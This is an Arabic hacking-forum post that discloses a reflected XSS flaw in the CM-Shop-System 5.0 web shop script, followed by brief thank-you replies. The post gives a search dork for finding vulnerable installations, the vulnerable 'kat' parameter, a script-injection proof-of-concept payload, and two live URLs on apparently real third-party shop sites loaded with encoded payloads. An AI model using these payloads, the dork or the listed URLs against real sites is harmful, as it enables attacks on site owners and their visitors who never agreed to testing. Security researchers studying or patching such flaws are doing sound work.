ثغرة في CM-Shop-System 5.0 من نوع XSS

السلام عليكم أنا اليوم إكتشفت ثغرة في هذا النوع من السكربتات CM-Shop-System 5.0 من نوع XSS على ما أضن أنها غير مكشوفة من قبل أي شخص كما أني لم أضعها في أي موقع من مواقع الثغرات كما أنني لا أسمح بنشرها على أي موقع من المواقع أترككم مع الثغرة [LEFT]

Typ: XSS (Cross Site Scripting)
Risk: Low
Dork: intext:“CM-Shop-System 5.0 Copyright 2010 programmed by P.Haase”

Producer Website: http://www.top24-webhosting.de/

Author: TA4G
Greetz to: All Members | elkorsan.com | Sec4ever.com | ArHack.Net
Email: S8T [ a t ] Hotmail [ d o t ] Com

Vulnerability:

http://localhost.com/index.php?kat=[XSS]

PoC:

http://127.0.0.1/index.php?kat="/><script>alert(1337)</script>
Example:

[http://www.colourandclean.de/index.php?kat=%22/%3E%3Cscript%3Ealert%28String.fromCharCode%2888,83,83%29%20%29%3C/script%3E](http://www.colourandclean.de/index.php?kat=%22/%3E%3Cscript%3Ealert%28String.fromCharCode%2888,83,83%29%20%29%3C/script%3E)

http://www.stilwelt24.de/index.php?kat=%22/%3E%3Cscript%3Ealert%28String.fromCharCode%2888,83,83%29%20%29%3C/script%3E


[/LEFT]

not bad keeep ; )

اغلب السكريبتات مصابة بهاد النوع من الثغرات شكراا

http://www.elkorsan.com/f68/t7616/

شكرا يحج :slight_smile:

هذا منتداي

أعلم أخي
:slight_smile: